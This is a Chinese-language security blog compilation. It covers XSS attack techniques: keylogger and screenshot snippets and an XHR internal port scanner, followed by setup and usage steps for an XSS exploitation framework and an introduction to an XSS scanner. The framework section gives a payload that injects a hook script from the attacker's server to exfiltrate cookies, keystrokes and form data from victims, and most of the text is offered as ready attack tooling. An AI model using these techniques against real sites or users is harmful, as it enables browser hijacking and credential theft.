XSS攻击在新花样 XSS攻击是一种传统的攻击方式，但随着这么多年的技术发现，尤其是在新的技术环境下，有人已经玩出了很多新花样。一、JavaScript的键盘记录器在JavaScript中创建键盘记录器通常涉及到监听键盘事件，但是出于隐私和安全的原因，现代浏览器限制了对键盘事件的访问，特别是跨域和在某些情况下，如在HTTPS页面上运行的HTTP脚本，浏览器会阻止键盘事件的监听。具体实现的伪码如下：document.addEventListener('keydown', function(event) { console.log('Key pressed:', event.key); // 这里可以添加你想要执行的代码 }); document.addEventListener('keyup', function(event) { console.log('Key released:', event.key); // 这里可以添加你想要执行的代码 }); document.addEventListener('keypress', function(event) { console.log('Key pressed and released:', event.key); // 这里可以添加你想要执行的代码 });二、JQuery键盘记录器jQuery监听键盘事件与原生JavaScript类似，但使用jQuery可以使得代码更加简洁。以下是使用jQuery来监听键盘事件的示例代码：$(document).ready(function() { $(document).keydown(function(event) { console.log('Key pressed:', event.which); // event.which 返回按键的键码 }); $(document).keyup(function(event) { console.log('Key released:', event.which); }); // keypress 事件在按下并释放键时触发，适用于获取字符输入 $(document).keypress(function(event) { console.log('Key pressed and character input:', String.fromCharCode(event.which)); }); });在页面加载完成后，为整个页面添加键盘事件的监听器。keydown事件在用户按下键时触发，keyup事件在用户释放键时触发，而keypress事件则在按下键并输入字符时触发。这种方式，要比原生的javascript简洁得多，不同的是，要依赖网页的jQuery类库，或者直接引用云端的jQuery类库。三、HTML5截图在HTML5中，可以使用canvas元素和toDataURL方法来实现截图功能。以下演示如何捕获网页上的截图： function captureFullPage() { var canvas = document.createElement('canvas'); var context = canvas.getContext('2d'); var width = window.innerWidth; var height = window.innerHeight; canvas.width = width; canvas.height = height; // 将页面绘制到canvas上 context.drawWindow(window, 0, 0, width, height, 'transparent'); // 将canvas转换为图片数据URL var imageData = canvas.toDataURL('image/png'); // 处理图片数据URL，如下载或显示 console.log(imageData);//也可以直接发送到远端 }这样，就会捕获当前视口的整个页面截图。如果需要捕获整个长页面，可能需要滚动页面并多次截图。四、基于XHR的内网端口扫描使用原生JavaScript和XMLHttpRequest (XHR) 来实现一个简单的端口扫描器：function scanPort(port, host) { var url = 'http://' + host + ':' + port + '/test'; // 测试的URL，可以根据需要更改路径 var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState === XMLHttpRequest.DONE) { if (xhr.status === 0) { console.log('Port ' + port + ' is closed or blocked by CORS.'); } else if (xhr.status === 200) { console.log('Port ' + port + ' is open.'); } else { console.log('Port ' + port + ' responded with status:', xhr.status); } } }; xhr.open('HEAD', url, true); xhr.send(); } // 使用示例：扫描example.com的80端口 scanPort(80, 'example.com'); scanPort(8080, 'example.com');

专注XSS跨站脚本漏洞利用工具 工具简介XSS Exploitation Tool是一款渗透测试工具，专注于跨站脚本漏洞的利用。该工具仅用于教育目的，请勿在真实环境中使用它！工具功能：有关受害浏览器的技术数据受害者的地理位置被吸引/访问过的页面的快照被钩住/访问的页面的源代码窃取输入字段数据渗出cookie键盘记录显示警告框重定向用户 工具安装在 Debian 11 上测试，您可能需要 Apache、Mysql 数据库和 PHP 模块： $ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom $ sudo rm /var/www/index.html安装 Git 并提取 XSS-Exploitation-Tool 源代码： $ sudo apt-get install git $ cd /tmp $ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git $ sudo mv XSS-Exploitation-Tool/* /var/www/html/安装 Composer，然后安装应用程序依赖项： $ sudo apt-get install composer $ cd /var/www/html/ $ sudo chown -R $your_debian_user:$your_debian_user /var/www/ $ composer install $ sudo chown -R www-data:$www-data /var/www/初始化数据库$ sudo mysql创建具有特定权限的新用户： MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> flush privileges; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> quit Bye创建数据库（将产生一个空页）：访问页面 http://server-ip/reset_database.php修改javascript钩子文件hook.js 是一个钩子文件 ，您需要将第一行的ip地址替换为XSS利用工具服务器的ip地址：var address = "your server ip";工具使用首先，创建一个页面（或利用跨站脚本漏洞）来插入 Javascript 挂钩文件（请参阅根目录下的exploit.html）：?vulnerable_param=<script src="http://your_server_ip/hook.js"/>然后，当受害者访问被挂钩的页面时，XSS利用工具服务器应该列出被挂钩的浏览器： 工具地址隐藏内容，请前往内页查看详情

自动化的XSS漏洞扫描程序：Traxss TraXSS XSS扫描器一款自动化XSS漏洞扫描程序，用Python3编写，利用无头selenium。Traxss是一个自动化框架，用于扫描URL和网页的XSS漏洞。它包括用于测试的575多个payloads，以及用于增强测试健壮性的多个选项。 Traxss XSS漏洞扫描器Traxss 安装与使用安装工具仓库git clone https://github.com/M4cs/traxss.git1 git clone https : //github.com/M4cs/traxss.git依赖Traxss取决于Chromedriver。在MacOS上，可以使用homebrew命令安装：brew install cask chromedriver1 brew install cask chromedriver另外，也可以在以下位置找到其他操作系统的版本：https://sites.google.com/a/chromium.org/chromedriver/downloads接着pip3 install -r requirements.txt1 pip3 install - r requirements . txt运行Traxsspython3 traxss.py1 python3 traxss . py这将启动交互式CLI，以指导您完成整个过程。扫描类型带有HTML的完整扫描使用具有575个以上Payloads的查询扫描，并尝试通过URL传递参数来查找XSS漏洞。它还将呈现HTML并尝试查找手动XSS漏洞（此功能仍处于beta中）。不带HTML的完整扫描此扫描将仅运行查询扫描。带HTML的快速扫描此扫描与完整的HTML相同，但只会使用7个攻击测试，而不是575+个。不带HTML的快速扫描此扫描与不带HTML的快速扫描相同，但将仅使用7个攻击测试，而不是575+个。